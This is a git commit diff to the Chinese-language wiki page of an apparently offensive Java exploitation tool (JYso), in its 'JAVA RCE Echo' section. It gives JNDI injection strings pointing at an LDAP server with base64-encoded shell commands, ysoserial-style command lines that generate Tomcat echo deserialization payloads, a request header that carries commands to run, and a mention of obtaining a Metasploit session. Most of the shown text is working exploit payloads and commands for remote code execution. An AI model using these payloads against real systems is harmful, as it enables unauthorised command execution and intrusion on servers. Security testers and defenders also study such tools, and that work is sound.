Updated 4、JAVA RCE Echo (markdown)

炁
2024-10-10 17:55:06 +08:00
parent dcd7b2d2bb
commit 27b04b2d05
+4 -2
@@ -28,6 +28,8 @@
使用时在 Header 中加入 `X-Token-Data` 也可以自行指定,其值为待执行的命令,命令执行结果将回显在 response 中。
通过参数`-ch cmd`来自定义
+ JNDI-Injection-Exploit 用法:
+ 不需要参数时
```
@@ -36,12 +38,12 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho}
+ 需要参数时
```
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz}
${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]}
```
+ ysoserial
```
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho"
java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -ch "cmd"
```
- 支持tomcatBypass路由直接上线msf: